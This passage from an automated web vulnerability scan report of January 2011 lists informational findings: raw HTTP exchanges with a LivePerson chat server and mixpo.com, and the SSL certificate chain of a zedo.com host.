P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 675

<html><body><script language="javascript">function lpRedirectBack() {document.location='/hc/5296924/cmd/url/?site=5296924&page='+escape("http://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWan
...[SNIP]...

29.4. https://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Request

GET /hc/5296924/?cmd=file&file=chatTemplate&site=5296924&sessionkey=H6680227135865200365-3761611791040242971K15949386&template=modern_mainstyle.css HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:16:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 13

<HTML></HTML>

29.5. http://www.mixpo.com/favicon.ico previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mixpo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.mixpo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=203637455.1296308034.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/68; __utma=203637455.2076230744.1296308034.1296308034.1296308034.1; __utmc=203637455; __utmb=203637455.1.10.1296308034

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1150-1275083924000"
Last-Modified: Fri, 28 May 2010 21:58:44 GMT
Content-Length: 1150
Date: Sat, 29 Jan 2011 13:34:12 GMT

............ .h.......(....... ..... .............................................vf.......u...u......vf......................................vf.`........................vf.`.....................{%p.{
...[SNIP]...

30. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://tt3.zedo.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.zedo.com,ST=California
Issued by:	Akamai Subordinate CA 3
Valid from:	Thu Aug 12 00:04:02 CDT 2010
Valid to:	Fri Aug 12 00:04:02 CDT 2011

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by CloudScan Vulnerability Crawler at Sat Jan 29 08:38:47 CST 2011.